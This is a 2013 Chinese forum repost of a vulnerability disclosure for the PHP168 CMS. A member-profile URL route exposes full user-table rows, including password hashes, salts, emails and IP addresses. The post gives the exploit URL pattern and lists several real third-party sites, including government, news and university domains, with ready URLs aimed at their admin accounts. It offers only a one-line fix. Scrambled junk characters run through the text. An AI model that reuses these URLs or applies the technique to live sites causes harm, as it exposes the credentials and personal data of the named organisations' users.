|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile; j8 e4 N# }$ Y& b7 o8 M
8 `+ }9 E3 _, I0 X7 q
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:& T1 Y- B" W1 D+ d9 r, u
+ [8 v' _9 C( H! mhttp://php168.cn/com/homepage.php/admin/member-profile
4 j2 b: Z O# a, @" R; M8 A5 k. N, Z) ~$ E! y l H
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。2 G4 m: o, B N6 n) Q
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
' D5 k" p. e/ {8 r
! k3 L8 K4 @; R" \7 U 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
$ I t+ W9 F$ E1 ]3 ~2 {7 S1 X2 K% w8 U( ?; D9 a! T
http://www.zjfzol.com.cn/homepage.php/admin/member-profile- h O1 I3 { u# \) F
- I$ v! ], t; z) g+ jhttp://www.scswl.cn/homepage.php/admin/member-profile( L, @- R/ f R* s
; @9 @' }1 n, n( J# A& m" l; ]% uhttp://www.tunet.edu.cn/homepage.php/admin/member-profile/ n; ]4 F+ w* i/ `# _
5 t# l1 n* R7 r2 f% S8 \$ u2 |
http://www.itlead.com.cn/homepage.php/admin/member-profile0 Y* E9 i# ` u/ v1 m9 Q
# M& h B# S) e! f" Uhttp://www.aedp.cn/homepage.php/admin/member-profile
. r1 U7 E5 W) u7 k: q% s! c1 C9 W0 p4 R$ H4 N4 m
http://www.qianlongnews.com/homepage.php/test/member-profile0 ^% w! d* ?+ ?9 @
1 B8 O+ X5 l8 `$ c. N; y3 q* J
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]( O4 x" H0 v- d$ p
[/table] | 
发表于 2013-9-21 16:02:53
收藏
分享
支持
反对